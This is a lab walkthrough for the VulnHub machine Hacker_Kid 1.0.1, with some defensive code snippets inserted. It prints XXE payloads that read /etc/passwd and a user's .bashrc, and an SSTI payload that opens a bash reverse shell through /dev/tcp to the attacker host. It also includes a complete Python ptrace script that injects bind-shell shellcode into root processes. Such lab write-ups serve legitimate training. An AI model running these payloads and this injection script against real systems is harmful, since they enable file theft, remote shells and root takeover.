Hacker_Kid-v1.0.1 walkthrough (boot2root notes)

Lab hosts: attacker Kali (192.168.109.131)

Target Hacker_Kid-v1.0.1 (192.168.109.133)

Goal: obtain root privileges

Network: NAT

Target download: Hacker kid: 1.0.1 ~ VulnHub

Part 1: Information gathering

Step 1: Identify the target IP address

arp-scan -l

Step 2: Probe the target's open ports

nmap -T4 -sV -O -p- -Pn 192.168.109.133

Ports 53 (DNS), 80 and 9999 are open.

Visit the IP address in a browser.

Step 3: Directory scan

# Project URL
https://github.com/maurosoria/dirsearch

# Scan the web root
python dirsearch.py -u "http://192.168.109.133"

Step 4: Browse port 80 and view the page source; it tells us to use the parameter page_no.

With page_no=1 the page hints that we should dig a little deeper.

Capture the request with Burp Suite and brute-force the parameter.

Send the captured request to the Intruder module; once the payload position is set, start the attack.

The response for page_no=21 differs from all the others.

Part 2: Vulnerability discovery and exploitation

DNS zone transfer

Step 1: Edit the hosts file

vi /etc/hosts

192.168.109.133 hackers.blackhat.local    # added line

The dig command mentioned on the page returns all of the DNS records.

dig hackers.blackhat.local @192.168.109.133

Step 2: Edit the hosts file again and add the records just obtained.

vi /etc/hosts

192.168.109.133 hackerkid.blackhat.local
192.168.109.133 blackhat.local

Step 3: Browse to the added domain. It opens a registration page, and the page source reveals an XML request.

XXE injection

Step 1: Capture the request first, then craft a payload to read a file.

<!DOCTYPE foo [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

Step 2: Use the php:// filter wrapper to read saket's .bashrc file.

<!DOCTYPE foo [<!ENTITY test SYSTEM 'php://filter/read=convert.base64-encode/resource=/home/saket/.bashrc'>]>

The file comes back Base64-encoded; decode it.
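An added defensive example, not code from the walkthrough or from the target application: a Python 3 handler for the registration document that refuses any DOCTYPE or entity declaration before the parser sees it, so probes of the kind shown above can never reach a file:/// or php:// resource regardless of parser defaults. The field names (name, tel, email, password) and both sample documents are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Reject the whole DTD mechanism up front: without a DOCTYPE there is no way to
# declare an external entity, which is what both XXE payloads above rely on.
_DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised for documents that are rejected by policy or are malformed."""


def parse_registration(raw):
    """Parse a registration document (bytes) into a {tag: text} dict.

    Any DTD/entity declaration is rejected before parsing. ElementTree's expat
    parser does not fetch external entities on its own, but making the policy
    explicit keeps it independent of parser configuration and library version.
    """
    if _DTD_MARKERS.search(raw):
        raise UnsafeXML("DTD / entity declaration rejected")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise UnsafeXML("malformed XML: %s" % exc)
    return {child.tag: (child.text or "") for child in root}


def classify(raw):
    """Return ("ok", fields) for accepted input or ("rejected", reason)."""
    try:
        return ("ok", parse_registration(raw))
    except UnsafeXML as exc:
        return ("rejected", str(exc))


# Constructed sample inputs: a benign registration and the two probes used above.
BENIGN = (b"<root><name>alice</name><tel>123</tel>"
          b"<email>a@example.test</email><password>pw</password></root>")
XXE_FILE_PROBE = (b"<!DOCTYPE foo [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>"
                  b"<root><name>&test;</name><tel>1</tel><email>e</email><password>p</password></root>")
XXE_PHP_PROBE = (b"<!DOCTYPE foo [<!ENTITY test SYSTEM "
                 b"'php://filter/read=convert.base64-encode/resource=/home/saket/.bashrc'>]>"
                 b"<root><name>&test;</name><tel>1</tel><email>e</email><password>p</password></root>")

if __name__ == "__main__":
    for doc in (BENIGN, XXE_FILE_PROBE, XXE_PHP_PROBE):
        print(classify(doc))
```

The pre-parse check is deliberately coarse: a benign document that happens to contain the literal text `<!ENTITY` inside a CDATA section is also rejected, which is the right trade-off for a registration endpoint that never needs a DTD.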

Step 3: With the username and password obtained, try to log in on port 9999.

username="admin"
password="Saket!#$%@!!"

The login fails; look at why.

Because the file sits under /home/saket, the credentials should be:

username="saket"
password="Saket!#$%@!!"

The page has a name field, which may be a template variable.

SSTI (server-side template injection)

Step 1: A generic test payload for template injection:

{{1+abcdef}}${1+abcdef}<?1+abcdef?>[1+abcdef]

If submitting this payload produces an error page like the one in the screenshot, that also indicates a template injection vulnerability.

Step 2: Try a reverse shell

{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.109.131/4444 0>&1"')}}

Try it URL-encoded:

%7b%25%20import%20os%20%25%7d%7b%7bos.system('bash%20-c%20%22bash%20-i%20%26%3e%20%2fdev%2ftcp%2f192.168.109.131%2f4444%200%3e%261%22')%7d%7d

Start a listener on Kali:
nc -lvvp 4444

The reverse shell connects.
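An added detection example, not part of the walkthrough: a Python 3 (standard library only) scan of web-server access-log lines for template syntax in query parameters, including the URL-encoded and double-encoded forms used above. The log format and every log line are constructed for the example; the third and fourth lines carry the probe payload and a `{% ... %}` statement tag in percent-encoded form.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (not output from the target). The last two hold
# template syntax in the `name` parameter, percent-encoded the way a browser
# or Burp would send it.
SAMPLE_LOG = """\
192.168.109.131 - - [01/Jan/2024:10:00:01 +0000] "GET /?page_no=21 HTTP/1.1" 200 512
192.168.109.131 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=alice HTTP/1.1" 200 128
192.168.109.131 - - [01/Jan/2024:10:00:03 +0000] "GET /?name=%7B%7B1%2Babcdef%7D%7D%24%7B1%2Babcdef%7D HTTP/1.1" 500 0
192.168.109.131 - - [01/Jan/2024:10:00:04 +0000] "GET /?name=%7b%25%20import%20os%20%25%7d%7b%7bos.system('id')%7d%7d HTTP/1.1" 200 64
"""

# Common-log-format request field: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Template syntax families covered by the probe payload above:
# Jinja2/Twig {{ }} and {% %}, ${ } (Freemarker, Velocity, EL) and <? ?>.
TEMPLATE_MARKERS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<\?.*?\?>", re.DOTALL)


def decode_param(value, rounds=2):
    """Undo up to `rounds` extra layers of percent-encoding (double encoding is common)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssti_probes(log_text):
    """Return (line_no, parameter, decoded_value) for each parameter containing template syntax."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qsl already removes one layer of percent-encoding.
        for key, value in parse_qsl(query, keep_blank_values=True):
            decoded = decode_param(value)
            if TEMPLATE_MARKERS.search(decoded):
                hits.append((line_no, key, decoded))
    return hits


if __name__ == "__main__":
    for hit in find_ssti_probes(SAMPLE_LOG):
        print("line %d: parameter %r contains template syntax: %r" % hit)
```

The `<? ... ?>` alternative also matches an XML prolog submitted in a parameter, so on an endpoint that legitimately accepts XML that branch should be dropped or the `name`-style parameters allow-listed.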

Part 3: Privilege escalation

Step 1: Look for SUID binaries

find / -perm -u=s -type f 2>/dev/null

Step 2: Try the CVE-2021-4034 exploit

# Project URL
https://github.com/berdav/CVE-2021-4034

Download the exploit zip to Kali, serve it over HTTP and fetch it onto the target.

# on Kali
python -m http.server 8080

# in the target shell
wget http://192.168.109.131:8080/CVE-2021-4034-main.zip
ls

Unzip the downloaded archive:

unzip CVE-2021-4034-main.zip
ls
cd CVE-2021-4034-main
ls
./cve-2021-4034.c

It failed...

Privilege escalation via capabilities

1. Use the following command to find programs that carry file capabilities:

/usr/sbin/getcap -r / 2>/dev/null    # -r: search recursively

python has the cap_sys_ptrace+ep capability, so we can abuse it to escalate privileges.
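An added audit example, not from the walkthrough: a Python 3 script that parses `getcap -r` output (both the `path cap_list` and the `path = cap_list` output styles seen across libcap versions) and flags binaries carrying capabilities that allow process control or identity change, marking interpreters such as the python binary found here as the highest-risk case. The sample getcap output is constructed and is not the target's real listing.

```python
# Capabilities that let the holder read or control other processes, change
# identity or bypass DAC. On a general-purpose interpreter any one of these
# is a direct privilege-escalation path, as cap_sys_ptrace on python shows.
DANGEROUS_CAPS = {
    "cap_sys_ptrace", "cap_setuid", "cap_setgid", "cap_sys_admin",
    "cap_dac_override", "cap_dac_read_search", "cap_sys_module", "cap_chown",
}

# Basenames that indicate a scripting runtime or debugger rather than a
# single-purpose tool.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "gdb", "tclsh", "lua")

# Constructed getcap -r output mixing both output styles.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/sbin/arping cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/perl cap_setuid+ep
"""


def parse_getcap_line(line):
    """Return (path, {capability, ...}) for one getcap line, or None if unparseable."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                      # older style: "/path = cap_a,cap_b+ep"
        path, caps = line.split(" = ", 1)
    else:                                  # newer style: "/path cap_a,cap_b=ep"
        parts = line.rsplit(" ", 1)
        if len(parts) != 2:
            return None
        path, caps = parts
    names = set()
    for clause in caps.split():
        # A clause looks like cap_a,cap_b+eip or cap_a=ep; drop the flag suffix.
        for sep in ("+", "=", "-"):
            if sep in clause:
                clause = clause.split(sep, 1)[0]
                break
        names.update(c for c in clause.split(",") if c)
    return path, names


def audit_capabilities(getcap_text):
    """Return (path, sorted dangerous caps, is_interpreter) for each risky binary."""
    findings = []
    for line in getcap_text.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, names = parsed
        bad = sorted(names & DANGEROUS_CAPS)
        if bad:
            base = path.rsplit("/", 1)[-1]
            is_interp = any(base.startswith(p) for p in INTERPRETERS)
            findings.append((path, bad, is_interp))
    return findings


if __name__ == "__main__":
    for path, caps, is_interp in audit_capabilities(SAMPLE_GETCAP):
        tag = "INTERPRETER" if is_interp else "binary"
        print("%s %s: %s" % (tag, path, ",".join(caps)))
```

cap_net_raw on ping and cap_ipc_lock on the keyring daemon are left alone because they are the intended, narrowly scoped use of file capabilities; the finding worth acting on is a capability from the dangerous set on anything that runs arbitrary user-supplied code.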

2. On Kali, write the privilege-escalation script and save it as exploit.py

# inject.py
# The C program provided at the GitHub link below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
# Python 2 script (the walkthrough runs it with python2.7): string literals are
# byte strings and str.encode('hex') is used below.

import ctypes
import sys
import struct

# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html

PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17

# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct

class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]

libc = ctypes.CDLL("libc.so.6")

pid = int(sys.argv[1])

# Define argument types and response type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64

# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers = user_regs_struct()

# Retrieve the values stored in the registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))

print("Instruction Pointer: " + hex(registers.rip))

print("Injecting Shellcode at: " + hex(registers.rip))

# Shell code copied from exploit db.
shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process, 4 bytes at a time, at the current rip.
for i in xrange(0, len(shellcode), 4):

    # Convert the 4-byte chunk to a little-endian integer.
    shellcode_byte_int = int(shellcode[i:4 + i].encode('hex'), 16)
    shellcode_byte_little_endian = struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
    shellcode_byte = int(shellcode_byte_little_endian, 16)

    # Write the chunk into the target's text segment.
    libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip + i), shellcode_byte)

print("Shellcode Injected!!")

# Modify the instruction pointer
registers.rip = registers.rip + 2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))

print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process; it resumes at the injected code.
libc.ptrace(PTRACE_DETACH, pid, None, None)

3. Start a local HTTP server on Kali and download the script to the target

# on Kali
python -m http.server 8080

# in the target shell
wget http://192.168.109.131:8080/exploit.py
ls

4. Injection has to target a root-owned process, so loop over every root process and try each one

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 exploit.py $i; done

Once the script succeeds, port 5600 is listening; connecting with nc completes the privilege escalation.

netstat -lntp | grep 5600
nc 192.168.109.133 5600


over...
